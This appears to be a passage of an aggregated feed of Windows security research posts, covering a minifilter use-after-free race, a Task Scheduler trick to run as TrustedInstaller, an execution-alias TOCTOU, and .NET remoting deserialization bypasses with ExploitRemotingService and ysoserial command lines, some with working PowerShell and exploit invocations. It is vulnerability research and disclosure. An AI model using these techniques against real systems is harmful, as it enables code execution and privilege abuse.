As shown below this sub-routine dequeues the pended requests from the data queue, retrieves the saved context structure in FLT_CALLBACK_DATA, completes the operation, and then goes on to free the context.

(Figure 9)
We can trigger what we've seen until now from a contained process by :
  • Calling FindFirstChangeNotificationA on an arbitrary directory e.g. "C:\" : Sends IRP_MJ_DIRECTORY_CONTROL and causes the delayed work item to be queued.
  • Closing the handle : Sends IRP_MJ_CLEANUP.
What can go wrong here ? The answer to that is freeing the context before the delayed work item is dispatched which would eventually receive a freed context and use it (use-after-free).

In other words, we have to make the minifilter receive an IRP_MJ_CLEANUP request before the delayed work item queued in IRP_MJ_DIRECTORY_CONTROL is dispatched for execution.

When trying to reproduce the vulnerability with a single thread, I noticed that the work item is always dispatched before IRP_MJ_CLEANUP is received. This makes sense in my opinion since the work item queue doesn't contain many items and dispatching a work item would take less time than all the work the subsequent call to CloseHandle does.

So the idea here was to create multiple threads that infinitely call :
CloseHandle(FindFirstChangeNotificationA(..)) to saturate the work item queue as much as possible and delay the dispatching of work items until the contexts are freed. A crash occurs once a work item accesses a freed context's pool allocation that was corrupted by some new allocation.

Below is the proof of concept to reproduce the vulnerability :



And here is a small Windbg trace to see what happens in practice (inside parentheses is the address of the context) :
    1. [...]
       QueueWorkItem(fffffa8062dc6f20)
       DeferredWorkItem(fffffa8062dc6f20)
       ExFreePoolWithTag(fffffa8062dc6f20)
       [...]
    2. QueueWorkItem(fffffa80635d2ea0)
       ExFreePoolWithTag(fffffa80635d2ea0)
       QueueWorkItem(fffffa8062dd5c10)
       ExFreePoolWithTag(fffffa8062dd5c10)
       QueueWorkItem(fffffa8062dd6890)
       ExFreePoolWithTag(fffffa8062dd6890)
       QueueWorkItem(fffffa8062ddac80)
       ExFreePoolWithTag(fffffa8062ddac80)
       QueueWorkItem(fffffa80624cd5e0)
       [...]
    3. DeferredWorkItem(fffffa80635d2ea0)
In (1.) everything is normal, the work item is queued, dispatched and then the pool allocation it uses is freed.

In (2.) things start going wrong, the work item is queued but before it is dispatched the context is freed.

In (3.) the deferred work item is dispatched with freed and corrupted memory in its context causing an access violation and thus a BSOD.

We see in this case that the freed pool allocation was entirely repurposed and is now part of a file object :

(Figure 10) : Click to Zoom

Reproducing the bug, you will encounter an access violation at this part of the code:

(Figure 11)

And as we can see, it expects multiple pointers to be valid including a resource pointer which makes exploitation non-trivial.

That's all for this article, until next time :)

Follow me on Twitter : here



The Art of Becoming TrustedInstaller - Task Scheduler Edition

By: tiraniddo
2 September 2019 at 05:28
2 years ago I wrote a post running a process in the TrustedInstaller group. It was pretty well received, and as others pointed out there's many way of doing the same thing. However in my travels I came across a new way I've not seen documented before, though I'm sure someone will point out where I've missed documentation. As with the previous post, this does require admin privileges, it's not a privilege escalation. Also I tested the behavior I'm documented on Windows 10 1903. Your mileage may vary on different versions of Windows.

It revolves around the Task Scheduler (obvious by the title I guess), specifically calling the IRegisteredTask::RunEx method exposed by the Task Scheduler COM API. The prototype of RunEx is as follows:

HRESULT RunEx(
  VARIANT      params,
  LONG         flags,
  LONG         sessionID,
  BSTR         user,
  IRunningTask **ppRunningTask
);

The thing we're going to use is the user parameter, which is documented as "The user for which the task runs." Cheers Microsoft! Through a bit of trial and error, and some reverse engineering it's clear the user parameter can take three types of string values:

  1. A normal user account. This can be the name or a SID. The user must be logged on at the time of starting the task as far as I can tell.
  2. The standard system accounts, i.e. SYSTEM, LocalService or NetworkService.
  3. A service account!
Number 3 is the one we're interested in here, it allows you to specify an installed service account, such as TrustedInstaller and the task will run as SYSTEM with the service SID included. Let's try it out.

The advantage of using the user parameter is the task can be registered to run as a normal user, and we'll change it at run time to be more sneaky. In theory you could directly register the task to run as TrustedInstaller, but then it'd be more obvious if anyone went looking. First we need to create a scheduled task, run the following script in PowerShell to create a simple task which will run notepad.

$a = New-ScheduledTaskAction -Execute notepad.exe
Register-ScheduledTask -TaskName 'TestTask' -Action $a

Now we need to call RunEx. While PowerShell has a Start-ScheduledTask cmdlet neither it, or the schtasks.exe /Run command allows you to specify the user parameter (aside, the /U parameter for schtask does not do what you might think). Instead as the COM API is scriptable we can just run some PowerShell again and use the COM API directly.

$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()

$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
$task = $folder.GetTask('TestTask')
$task.RunEx($null, 0, 0, $user)

After executing this script you should find a copy of notepad running as SYSTEM with with the TrustedInstaller group in the access token.


Enjoy responsibly. 

Overview of Windows Execution Aliases

By: tiraniddo
11 September 2019 at 13:10
I thought I'd blogged about this topic, however it turns out I hadn't. This blog is in response to a recent Twitter thread from Bruce Dawson on a "fake" copy of Python which Microsoft seems to have force installed on some peoples Windows 10 1903 installations. I'll go through the main observation in the thread that the Python executable is 0 bytes in size, how this works under the hood to start a process and I'll finish with a dumb TOCTOU bug which still exists in part of the implementation which _might_ be useful as part of an EOP chain.

Execution Aliases for UWP applications were introduced in Windows 10 Fall Creators Update (1709/RS3). For application developers this feature is exposed by adding an AppExecutionAlias XML element to the application's manifest. The manifest information is used by the AppX installer to drop the alias into the %LOCALAPPDATA%\Microsoft\WindowsApps folder, which is also conveniently (or not depending on your POV) added to the user PATH environment variable. This allows you to start a UWP application as if it was a command line application, including passing command line arguments. One example is shown below, which is taken from the WinDbgX manifest.

<uap3:Extension Category="windows.appExecutionAlias" Executable="DbgX.Shell.exe" EntryPoint="Windows.FullTrustApplication"> <uap3:AppExecutionAlias> <desktop:ExecutionAlias Alias="WinDbgX.exe" />
</uap3:AppExecutionAlias></uap3:Extension>

This specifies an execution alias to run DbgX.Shell.exe from the file WinDbgX.exe. If we go to the WindowsApps folder we can see that there is a file with that name, and as mentioned in the Twitter thread it is a 0 byte file. Also if you try and open the file (say using the type command) it fails.

Directory listing of WindowsApps folder showing 0 byte WinDbgX.exe file and showing that trying to open file fails.

How can an empty file result in a process being created? Executing the WinDbgX.exe file inside a shell while running Process Monitor shows some interesting results which I've highlighted below:

Process Monitor output showing opens to WinDbgX with a "REPARSE" result and also a call to get the reparse point data.

The first thing to highlight is the CreateFile calls which return a "REPARSE" result. This is a good indication that the file contains a reparse point. You might assume therefore that this file is a symbolic link to the real target, however a symbolic link would still be possible to open which we can't do. Another explanation is the reparse point is a custom type, not understood by the kernel. This ties in with the subsequent call to FileSystemControl with the FSCTL_GET_REPARSE_POINT code which would indicate some user-mode code is requesting information about the stored reparse point. Looking at the stack trace we can see who's requesting the reparse point data:

Stack trace of FSCTL_GET_REPARSE_POINT showing calls from CreateProcessInternal

The stack trace shows the reparse point data is being queried from inside CreateProcess, through the exported function LoadAppExecutionAliasInfoEx. We can dig into CreateProcessInternal to see how it all works:

HANDLE token = ...;NTSTATUS status = NtCreateUserProcess(ApplicationName, ..., token); if (status == STATUS_IO_REPARSE_TAG_NOT_HANDLED) { LPWSTR alias_path = ResolveAlias(ApplicationName); PEXEC_ALIAS_DATA alias; LoadAppExecutionAliasInfoEx(alias_path, &alias); status = NtCreateUserProcess(alias.ApplicationName, ..., alias.Token);}

CreateProcessInternal will first try and execute the path directly, however as the file has an unknown reparse point the kernel fails to open the file with STATUS_IO_REPARSE_TAG_NOT_HANDLED. This status code provides a indicator to take an alternative route, the alias information is loaded from the file's reparse tag using LoadAppExecutionAliasInfoEx and an updated application path and access token are used to start new the new process.

What is the format of the reparse point data? We can easily dump the bytes and have a look in a hex editor:

Hex dump of reparse data with highlighted tag.

The first 4 bytes is the reparse tag, in this case it's 0x8000001B which is documented in the Windows SDK as IO_REPARSE_TAG_APPEXECLINK. Unfortunately there doesn't seem to be a corresponding structure, but with a bit of reverse engineering we can work out the format is as follows:

Version: <4 byte integer>
Package ID: <NUL Terminated Unicode String>
Entry Point: <NUL Terminated Unicode String>
Executable: <NUL Terminated Unicode String>
Application Type: <NUL Terminated Unicode String>

The reason we have no structure is probably because it's a serialized format. The Version field seems to be currently set to 3, I'm not sure if there exists other versions used in earlier Windows 10 but I've not seen any. The Package ID and Entry Point is information used to identify the package, an execution alias can't be used like a shortcut for a normal application it can only resolve to an installed packaged application on the system. The Executable is the real file to executed that'll be used instead of the original 0 byte alias file. Finally Application Type is the type of application being created, while a string it's actually an integer formatted as a string. The integer seems to be zero for desktop bridge applications and non-zero for normal sandboxed UWP applications. I implemented a parser for the reparse data inside NtApiDotNet, you can view it in NtObjectManager using the Get-ExecutionAlias cmdlet.

Result of executing Get-ExecutionAlias WinDbgX.exe

We now know how the Executable file is specified for the new process creation but what about the access token I alluded to? I actually mentioned about this at Zer0Con 2018 when I talked about Desktop Bridge. The AppInfo service (of UAC fame) has an additional RPC service which creates an access token from a execution alias file. This is all handled inside LoadAppExecutionAliasInfoEx but operates similar to the following diagram:

Operation of RAiGetPackageActivationToken.

The RAiGetPackageActivationToken RPC function takes a path to the execution alias and a template token (which is typically the current process token, or the explicit token if CreateProcessAsUser was called). The AppInfo service reads the reparse information from the execution alias and constructs an activation token based on that information. This token is then returned to the caller where it's used to construct the new process. It's worth noting that if the Application Type is non-zero this process doesn't actually create the AppContainer token and spawn the UWP application. This is because activation of a UWP application is considerably more complex to stuff into CreateProcess, so instead the execution alias' executable file is specified as the SystemUWPLauncher.exe file in system32 which completes activation based on the package information from the token.

What information does the activation token contain? It's basically the Security Attribute information for the package, this can't normally be modified from a user application, it requires TCB privilege. Therefore Microsoft do the token setup in a system service. An example token for the WinDbgX alias is shown below:

Token security attributes showing WinDbg package identity.

The rest of the activation process is not really that important. If you want to know more about the process checkout my talks on Desktop Bridge and the Windows Runtime.

I promised to finish up with a TOCTOU attack. In theory we should be able to create execution alias for any installed application package, it might not start a working process be we can use RAiGetPackageActivationToken to get a new token with explicit package security attributes which could be useful for further exploitation. For example we could try creating one for the Calculator package with the following PowerShell script (note this uses version information for calculator on 1903 x64).

Set-ExecutionAlias -Path C:\winapps\calc.exe `
     -PackageName "Microsoft.WindowsCalculator_8wekyb3d8bbwe" `
     -EntryPoint "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App" `
     -Target "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.53.0_x64__8wekyb3d8bbwe\Calculator.exe" `
     -AppType UWP1

If we call RAiGetPackageActivationToken this works and creates a new token, however it creates a reduced privilege UWP token (it's not an AppContainer but for example all privileges are stripped and the security attributes assumes it'll be in a sandbox). What if we wanted to create a Desktop Bridge token which isn't restricted in this way? We could change the AppType to Desktop, however if you do this you'll find RAiGetPackageActivationToken fails with an access denied error. Digging a bit deeper we find it fails in daxexec!PrepareDesktopAppXActivation, specifically when it's checking if the package contains any Centennial (now Desktop Bridge) applications.

HRESULT PrepareDesktopAppXActivation(PACTIVATION_INFO activation_info) { if ((activation_info->Flags & 1) == 0) { CreatePackageInformation(activation_info, &package_info); if (FAILED(package_info->ContainsCentennialApplications())) { return E_ACCESS_DENIED; // <-- Fails here. } } // ... }

This of course makes perfect sense, no point creating an desktop activation token for a package which doesn't have desktop applications. However, notice the if statement, if bit 1 is not set it does the check, however if set these checks are skipped entirely. Where does that bit get set? We need to go back to caller of PrepareDesktopAppXActivation, which is, unsurprisingly, RAiGetPackageActivationToken.

ACTIVATION_INFO activation_info = {};bool trust_label_present = false;HRESULT hr = IsTrustLabelPresentOnReparsePoint(path, &trust_label_present);if (SUCCEEDED(hr) && trust_label_present) { activation_info.Flags |= 1;} PrepareDesktopAppXActivation(&activation_info);

This code shows that the flag is set based on the result of IsTrustLabelPresentOnReparsePoint. While we could infer what that function is doing let's reverse that as well:

HRESULT IsTrustLabelPresentOnReparsePoint(LPWSTR path,
bool *trust_label_present) { HANDLE file = CreateFile(path, READ_CONTROL, ...); if (file == INVALID_HANDLE_VALUE) return E_FAIL; PSID trust_sid; GetWindowsPplTrustLabelSid(&trust_sid); PSID sacl_trust_sid; GetSecurityInfo(file, SE_FILE_OBJECT, PROCESS_TRUST_LABEL_SECURITY_INFORMATION, &sacl_trust_sid); *trust_label_present = EqualSid(trust_sid, sacl_trust_sid); return S_OK;}

Basically what this code is doing is querying the file object for its Process Trust Label. The label can only be set by a Protected Process, which normally we're not. There are ways of injecting into such processes but without that we can't set the trust label. Without the trust label the service will do the additional checks which stop us creating an arbitrary desktop activation token for the Calculator package.

However notice how the check re-opens the file. This is occurring after the reparse point has been read which contains all the package details. It should be clear that here is a TOCTOU, if you can get the service to first read a execution alias with the package information, then switch that file to another which has a valid trust label we can disable the additional checks. This was an attack that my BaitAndSwitch tool was made for. If you build a copy then run the following command you can then use RAiGetPackageActivationToken with the path c:\x\x.exe and it'll bypass the checks:

BaitAndSwitch c:\x\x.exe c:\path\to\no_label_alias.exe c:\path\to\valid_label_alias.exe x

Note that the final 'x' is not a typo, this ensures the oplock is opened in exclusive mode which ensures it'll trigger when the file is initially opened to read the package information. Is there much you can really do with this? Probably not, but I thought it was interesting none the less. It'd be more interesting if this had disabled other, more important checks but it seems to only allow you to create a desktop activation token.

That about wraps it up for now. Embedding this functionality inside CreateProcess was clever, certainly over the crappy support for UAC which requires calling ShellExecute. However it also adds new and complex functionality to CreateProcess which didn't exist before, I'm sure there's probably some exploitable security bug in the code here, but I'm too lazy to find it :-)

Random PDC Driver

8 October 2019 at 13:37
Found this funny driver: The pdc.sys windows driver has a DriverUnload routine but it calls KeBugCheckEx causing a bluescreen. Just run "sc stop pdc" and see for yourself ;) I wonder why they registered DriverUnload if the driver does not support unload.. 🤔 pic.twitter.com/TNpKIZGvZX — Ori Damari (@0xrepnz) October 8, 2019

About Me

19 October 2019 at 16:37
Hey! My name is Ori Damari, and I love low level code. I hope you find this blog interesting and learn new stuff .. I do low level research for living. My main interests are: Malware Operating Systems Windows Internals Reverse Engineering Kernel Development Software Development repnz is my nickname (I pronounce it rep notzero..) - I like assembly. You can contact me easily using twitter messages: @0xrepnz

Bypassing Low Type Filter in .NET Remoting

By: tiraniddo
25 October 2019 at 21:02
I recently added a new feature my .NET remoting exploitation tool which is many cases allow you to exploit an arbitrary service through serialization. This feature has always existed in the tool, if you passed the useser option, however it only worked if the service had enabled Full Type Filter mode, the default for remoting services is Low Type Filter which my tool couldn't easily exploit. I'm going to explain how I bypassed it Low Type Filter mode in the latest tool.

It's worth noting that this technique is currently unpatched, however no one should be using .NET remoting in a modern context (*cough* Visual Studio *cough*).

I'd recommend starting by reading my previous blog post on this subject as it describes where the Type Filtering comes into play. You can also read this MSDN page which describes what can and cannot be deserialized during a .NET remoting call with Low versus Full Type Filtering enabled.

In simple terms enabling Low (which is the default) over Full results in the following restrictions:
  • Object types derived from MarshalByRefObject, DelegateSerializationHolder, ObjRef, IEnvoyInfo and ISponsor can not be deserialized. 
  • All objects which are deserialized must not Demand any CAS permission other than SerializationFormatter permission.
The useser technique abuses the fact that certain classes such as DirectoryInfo and FileInfo are both derived from MarshalByRefObject (MBR) and are also serializable. By deserializing an instance of one of the special classes inside a carefully crafted Hashtable, with a MBR instance of IEqualityComparer you can get the server to pass back the instance. As this object is passed back over a remoting the channel the DirectoryInfo or FileInfo objects are marshalled by reference and are stuck inside the server. We can now call methods on the returned object to read and write arbitrary files, which can use to get full code execution in the server. I've summarized the main interactions in the following diagram:
1, Create DirectoryInfo, 2, Serialize DirectoryInfo, 3, Handle Remoting, 4, Deserialize DirectoryInfo, 5, Marshal By Reference, 6, Capture DirectoryInfo, 7, Create AdminFile.txt, 8, AdminFile.txt created.

Low Type Filter acts to modify the behavior of the BinaryServerFormatterSink block, which encapsulates blocks 3, 4 and 5. The change in behavior blocks the useser technique in three ways.

Firstly in order to get the instance of the special object passed back to the client we need to pass a MBR IEqualityProvider. This will be blocked during handling of the remoting message (3).

Secondly when deserializing an instance of FileInfo or DirectoryInfo (4) a Demand is made for a FileIOPermission for the path to access. As the permission Demand is made during deserialization it hits the restriction that only SerializationFormatter permissions are allowed.

Thirdly, even if the object is deserialized successfully we'll hit a final problem, calling the IEqualityProvider (5 and 6) over a remoting channel to pass back the reference requires setting up a new TCP or Named Pipe connection. Setting up the connection will also hit the limited permissions and again throw an exception causing the call to fail.

How can we work around the three issues? Let's first bypass the type checking which prevents MBR objects being deserialized. If you dig into the code you'll find the type checks are performed in the ObjectReader::CheckSecurity method, which is as follows:

internal void CheckSecurity(ParseRecord pr) {
Type t = pr.PRdtType;
if ((object)t != null){
if(IsRemoting) {
if (typeof(MarshalByRefObject).IsAssignableFrom(t))
throw new ArgumentException();
FormatterServices.CheckTypeSecurity(t, formatterEnums.FEsecurityLevel);
}
}
}

The important thing to note is that the checks are only made if the IsRemoting property is true. What determines the value of the property? Again we can just look in the reference source:

private bool IsRemoting {
get {
return (bMethodCall || bMethodReturn);
}
}

What sets bMethodCall or bMethodReturn? They're set by the BinaryFormatter when it encounters the special MethodCall or MethodReturn record types. It turns out that maybe for performance or security (unclear) the formatter can special case these object types when used in .NET remoting and only storing properties of these objects when serializing and reconstructing the method objects when deserializing.

However if you read my previous blog post you'll notice something, I was unmarshalling a MBR instance of an IMessage, and that didn't hit the checks. This was because as long as the top level record is not a MethodCall or MethodReturn record type then we can deserialize anything we like, that was easy to bypass. In theory we can just pass a serialized Hashtable as the top level object, it'll cause the remoting server code to fault when trying to call methods on the message object but by then it'd be too late. In fact this is exactly what the useser option does anyway, however it's the second security feature which really causes us problems trying to get it to work on Low Type Filter.

When handling an incoming request is enables a PermitOnly CAS grant over the deserialization process, which only allows SerializationFormatter permissions to be asserted. You can see it in action in the reference source here, which I've copied below.

PermissionSet currentPermissionSet = null;                  
if (this.TypeFilterLevel != TypeFilterLevel.Full) {
currentPermissionSet = new PermissionSet(PermissionState.None);
currentPermissionSet.SetPermission(
      new SecurityPermission(
          SecurityPermissionFlag.SerializationFormatter));                    
}

try {
if (currentPermissionSet != null)
currentPermissionSet.PermitOnly();

// Deserialize Request - Stream to IMessage
requestMsg = CoreChannel.DeserializeBinaryRequestMessage(
    objectUri, requestStream, _strictBinding, this.TypeFilterLevel);                    
}
finally {
if (currentPermissionSet != null)
CodeAccessPermission.RevertPermitOnly();
}


As we're passing the Hashtable containing the serialized object we want to capture as well as the MBR IEqualityComparer as the top level object all of our machinations will run during this PermitOnly grant, which as I've already noted will fail. If we could defer the deserialization, or at least any privileged operation until after the CAS grant is reverted we'd be able to exploit this trick, but how can we do that?

One way to defer code execution is to exploit object finalization. Basically when an object's resources are about to be reclaimed by the GC it'll call the object's finalizer. This call is made on a GC thread completely outside the deserialization process and so wouldn't be affected by the CAS PermitOnly grant. In fact abusing finalizers was something I pointed out in my original research on .NET serialization, a good example is the infamous TempFileCollection class.

I thought about trying to find a useful gadget to exploit this, however there were two problems. First the difficulty in finding a suitable object which is both serializable and has a useful finalizer defined and second, the call to the finalizer is non-deterministic as it's whenever the GC gets called. In theory the GC might never be called.

I decided to focus on a different approach based on a non-obvious observation. The PermitOnly security behaviors of Low Type Filter only apply when calling a method on a server object, not deserializing the return value. Therefore if I could find somewhere in the server which calls back to a MBR object I control then I can force the server to deserialize an arbitrary object. This object can be used to mount the attack as the deserialization would not occur under the PermitOnly CAS grant and I can use the same Hashtable trick to capture a DirectoryInfo or FileInfo object.

In theory you could find an exposed method on the server object to use for this callback, however I wanted my code to be generic and not require knowledge of the server object outside of the knowing the URI. Therefore it'd have to be a method we can call on the MBR or base Object class. An initial look only shows one candidate, the Object::Equals method which takes a single parameter. Unfortunately most of the time a server object won't override this method and the default just performs reference equality which doesn't call any methods on the passed object.

The only other candidates are the InitializeLifetimeServer or GetLifetimeService methods which  return an MBR which implements the ILease interface. I'm not going to go into what this is used for (you can read up on it on MSDN) but what I noticed was the ILease interface has a Register method which takes an object which implements ISponsor interface. If you registered an MBR object in the client with the server's lifetime service then when the server wants to check if the object should be destroyed it'll call the ISponsor::Renewal method, which gives us our callback. While the method doesn't return an object, we can just throw an exception with the Hashtable inside and exploit the service. Victory?

Not quite, it turns out that we've now got new problems. The first one is the Renewal call only happens when the lifetime counter expires, the default timeout is around 10 minutes from the last call to the server. This means that our exploit will only run at some long, potentially indeterminate point in time. Not the end of the world, but as frustrating as waiting for a GC run to get a finalizer executed. But the second problem seems more insurmountable, in order to set the ISponsor object we need to make an actual call to the server, however Low Type Filter would stop us from passing an MBR ISponsor object as the top level object would be a MethodCall record type which would throw an exception when it was encountered during argument deserialization.

What can we do? Turns out there's an easy way around this, the framework provides us with a full serializable MethodCall class. Instead of using the MethodCall record type we can instead package up a serializable MethodCall object as the top level object with all the data needed to make the call to Register. As the top level object is using a normal serialized object record type and not a MethodCall record type it'll never trigger the type checking and we can call Register with our MBR ISponsor object.

You might wonder if there's another problem here, won't deserializing the MBR cause the channel to be created and hit the PermitOnly CAS grant? Fortunately channel setup is deferred until a call is made on the object, therefore as long as no call is made to the MBR object during the deserialization process we'll be out of the CAS grant and able to setup the channel when the Renewal method is called.

We now have a way of exploiting the remoting service without knowledge of any specific methods on the server object, the only problem is we might need to wait 10 minutes to do it. Can we improve on the time? Digging further into default remoting implementation I noticed that if an argument being passed to a method isn't directly of the required type the method StackBuilderSink::SyncProcessMessage will call Message::CoerceArgs to try the coerce the argument to the correct type. The fallback is to call Convert::ChangeType passing the needed type and the object passed from the client. To convert to the correct type the code will see if the passed object implements the IConvertible interface and call the ToType method on it. Therefore, instead of passing an implementation of ISponsor to Register we just pass one which implements IConvertible the remoting code will try and coerce it using ChangeType which will give us our needed callback immediately without waiting 10 minutes. I've summarized the attack in the following diagram:

1, Call ILease::Register, 2, Handle Message, 3 Coerce Arguments, 4, Create DirectoryInfo, 5, Deserialize DirectoryInfo, 6, Marshal DirectoryInfo, 7, Capture DirectoryInfo, 8 Create AdminFile.

This entire exploit is implemented behind the uselease option. It works in the same way as useser but should work even if the server is running Low Type Filter mode. Of course there's caveats, this only works if the server sets up a bi-direction channel, if it registers a TcpChannel or IpcChannel then that should be fine, but if it just sets up a TcpServerChannel it might not work. Also you still need to know the URI of the server and bypass any authentication requirements.

If you want to try it out grab the code from github and compile it. First run the ExampleRemotingServer with the following command line:

ExampleRemotingService.exe -t low

This will run the example service with Low Type Filter. Now you can try useser with the following command line:

ExploitRemotingService.exe --useser tcp://127.0.0.1:12345/RemotingServer ls c:\

You should notice it fails. Now change useser to uselease and rerun the command:

ExploitRemotingService.exe --uselease tcp://127.0.0.1:12345/RemotingServer ls c:\

You should see a directory listing of the C: drive. Finally if you pass the autodir option the exploit tool will try and upload an assembly to the server's base directory and bootstrap a full server from which you can call other commands such as exec.

ExploitRemotingService.exe --uselease --autodir tcp://127.0.0.1:12345/RemotingServer exec notepad

If it all works you should find the example server will spawn notepad. This works on a fully up to date version of .NET (e.g. .NET 4.8).

The take away from this is DO NOT EVER USE .NET REMOTING IN PRODUCTION. Even if you're lucky and you're not exploitable for some reason the technologies should be completely deprecated and (presumably) will never be ported .NET Core.

Reverse Engineering Optimizations: Division By Multiplication

26 October 2019 at 15:06
Intro Reverse engineering compiler optimizations can delay a reverse engineer a-lot. By learning how the compiler optimizes certain things, you can save lots of time. Knowning the pattern, the next time you see this optimization you’ll recognize right away how to decompile it. In this blog post series I’ll document how to decompile certain compiler optimizations, I hope it’ll save some time for you. Division By Multiplication There’s no heavy math in this post lol.

Autochk Rootkit Analysis

1 November 2019 at 11:00
Introduction Finally had time to write about this rootkit I saw last week. This rootkit is a very simple, it does not employ any uber fancy methods or something, but I do find it nice so I wanted to share. The name of the driver is “autochk.sys” - that’s why we’ll call it the autochk rootkit. The sample is already known (28924b6329f5410a5cca30f3530a3fb8a97c23c9509a192f2092cbdf139a91d8), but I haven’t found any public analysis. The rootkit was compiled on the 27/8/2017 according to the PE timestamp.

The Ethereal Beauty of a Missing Header

By: tiraniddo
6 November 2019 at 08:40
Skip to the end if you don't want to listen to me regaling you with a mostly made up story :-)

It was a dark and stormy night, as cliches goes you might as well go with a classic. With little else to occupy my time I booted my PC and awoke my trusted companion Wireshark (née Ethereal) and look what communications were being lost to time due to the impermanence of localhost. Hey, don't judge me, I wrote a book on it remember?

Observing the pastel shaded runes flashing before my eyes I divined a new understanding of that which remains hidden from a mortal's gaze. As if a metaphor for our existence I observed the BITS service shouting into void, desperately trying to ask a question of the WinRM service that will never be answered. In an instant something else caught my eye, unrelated to the intelligence or lack thereof of data transfers. As the hex flickered across my screen I realized in horror what it was; it's grim visage staring at me like some horrible ghost of the past. What I saw both repulsed and excited me, here was something I could reason about:

Screenshot from wireshark showing .NET remoting network traffic which has a .NET magic at the start.

Those three little characters, .NET,  reverberated in my mind, almost as if the computer was repeating a forbidden soliloquy on the assumption it wouldn't be overheard. Here in the year, 2019, I shouldn't expect to read such a subversive codex as this. What malfeasance had my Operating System undertaken to spout such vulgar prose. It was a horrible night to find the .NET Remoting protocol.

It's said [citation needed], "Eternal damnation is reserved for evil people and developers who use insecure deprecated technologies," if such a distinction could be made between the two. Whomever was not paying attention to MSDN was clearly up to no good. I made the decision to track down the source of this abomination and bring them to justice. As with all high crimes, evidence of misdeeds is meaningless without suspects; assuming the perpetrator was still around I did what all good detectives do, used my position of authority (an Admin Command Prompt) and interrogated every shifty character who was hanging around the local neighborhood. Or at least I looked up the listening TCP ports using netstat with the -b switch to print the guilty party. Two suspects came immediately to light:

C:\> netstat -p TCP -nqb
....
TCP    127.0.0.1:51889        0.0.0.0:0              LISTENING
[devenv.exe]
TCP    127.0.0.1:51890        0.0.0.0:0              LISTENING
[Microsoft.Alm.Shared.Remoting.RemoteContainer.dll]

Caught red-handed, I moved in to apprehend them. Unfortunately, devenv (records indicate is an alias for Mr Visual Studio 2017 Esp, a cad of some notoriety) was too unwieldy to subdue. However his partner in crime was not so blessed and easily fell within my clutches. Dragging him back to the (work)station I subjected the rogue, whom I nicknamed Al due to his long, unpronounceable name, to a thorough interrogation. He easily confessed his secrets, with application of a bit of decompilation, part of which I've reproduced below for the edification of the reader:

public static IRemotingChannel RegisterRemotingChannel(
                               string portName) {
    var sinkProvider = new BinaryServerFormatterSinkProvider
    {
        TypeFilterLevel = TypeFilterLevel.Full
    };
    var properties = new Dictionary<string, object> {
        { "name", portName },
        { "port", 0 },
        { "rejectRemoteRequests", true }
    };
    var channel = new TcpServerChannel(properties, sinkProvider);
    return new RemotingChannel(channel, 
            () => channel.GetChannelUri());
}

Of course, the use of .NET Remoting had Al bang to rights, but even if a judge decided that wasn't sufficient of crime I could also charge him with using a TCP channel with no authentication and enabling a Full Type Filter mode. I asked Al to explain himself, so speaking in a cod, 18th Century Cockney accent (even though his identification was clearly of a man from the west coast of the United States of America) he tried to do so:

Moi: Didn't you know what you were doing was a crime against local security?
Al: Sure Guv'na, but devy told me that'd his bleedin' plan couldn't be exploited?
M: In what way did your mate 'devy' claim such a thing was possible?
A: Well for one, we'd not set a pre-agreed port to talk to us on. [Presumably referring to the use of port '0' which automatically allocates a random port].
M: But I found your port, it wasn't hard to do as I could hear you talking between yourselves. Surely he had a better plan that?
A: Well, we don't trust the scum from outside the neighborhood, we only trusted people locally. [This was the meaning of rejectRemoteRequests which ensures it only bind the port to localhost].
M: I'm surprised you trust everyone locally? What about other ne'er-do-wells logged on to the same machine but in different sessions?
A: See coppa' we thought of that, in order to talk to me or devy you'd need to know our secret code word, without that you ain't gettin' nowt. [the portName presumably].

This final answer stumped me, sure they weren't authenticating each other but at least if the code word was unguessable it'd be hard to exploit them. Further investigation indicated their secret code word was a randomly generated Globally Unique Identifier which would be almost impossible to forge. Maybe I'd have to let Al free after all?

But something gnawed at me, neither Al or Devy were very bright, there must be more to this story. After further pressing, Al confessed that he never remembered the code word, and instead had a friend, BinaryServerFormatterSink (Binny to those in a similar trade) verify it for them using the following check:

string objectUri = wkRequestHeaders.RequestUri;
           
if (objectUri != lastUri 
    && RemotingServices.GetServerTypeForUri(objectUri) == null)
                    throw new RemotingException();
                
lastUri = objectUri;

I realized that'd I'd got him. Binny was lazy, he remembered the last code word (lastUri) he'd been given and stored it away for safekeeping . If no one had ever talked to Al before then Binny didn't yet know the code word, you couldn't given him a random one but if you don't give him a code word at all then lastUri would equal objectUri because both were set to null. This whole scheme had come crashing down on their heads.

I reported Binny to the authorities (via a certain Chief Constable Dorrans) but they seemed to be little interested in making the perpetrator change their ways. I made a note in my log book (ExploitRemotingServices) and continued on my way, satisfied in a job well done, sort of.

The Less Wankery, Useful, Technical Bit

TL;DR; for some reason Visual Studio 2017 (and possibly 2019) has code which specifically uses .NET remoting in a fairly insecure way. It doesn't do authentication, it uses TCP for no obvious reason and it sets the type filter mode to Full which means it'd be trivially vulnerable to serialization attacks (see blog posts passim). However, on a positive note it does bind to localhost only, which will ensure it's not remotely exploitable and it chooses to generate a random service name, from a GUID, which makes it almost impossible to guess or brute force.

Therefore, it's basically unexploitable outside a difficult to win race condition and only if the attacker is on the same machine as the user running Visual Studio. I don't like those odds, so I never seriously considered reporting it to MSRC.

Why I am even blogging about it? It's all to do with the fact that you can not specify the URI, and as long a no one has previously connected to the service successfully then you can reach the call to BinaryFormatter::Deserialize and potentially get arbitrary code execution.  This might be especially interesting if you're running a pentesting engagement and you find an exposed .NET remoting service but do not have a copy of the client or server with which to extract the appropriate URI to make a call.

How would you know if you do find such a service? If you send garbage to a .NET remoting service (at least not in secure mode) it will respond with the previously mentioned magic ".NET" signature data, as show in the following screenshot from Wireshark:

Screen shot of Wireshark following connection. The string Boo! is sent to the server which responds with .NET remoting protocol.

When combined with the fact that the .NET remoting protocol doesn't require any negotiation (again assuming no secure mode) we can create a simple payload which would exploit any .NET remoting server assuming we have a suitable serialization payload, the server is running in Full type filter mode and nothing has previously connected to the service.

Let's put that payload together. You'll need the latest ExploitRemotingService from GitHub and also a copy of ysoserial.net to generate a serialization payload.  First run the following ysoserial comment to generate a simple TypeConfuseDelegate which will start notepad when deserialized and write the raw data to the file run_notepad.bin:

ysoserial.exe -f BinaryFormatter -o raw -g TypeConfuseDelegate -c notepad > run_notepad.bin

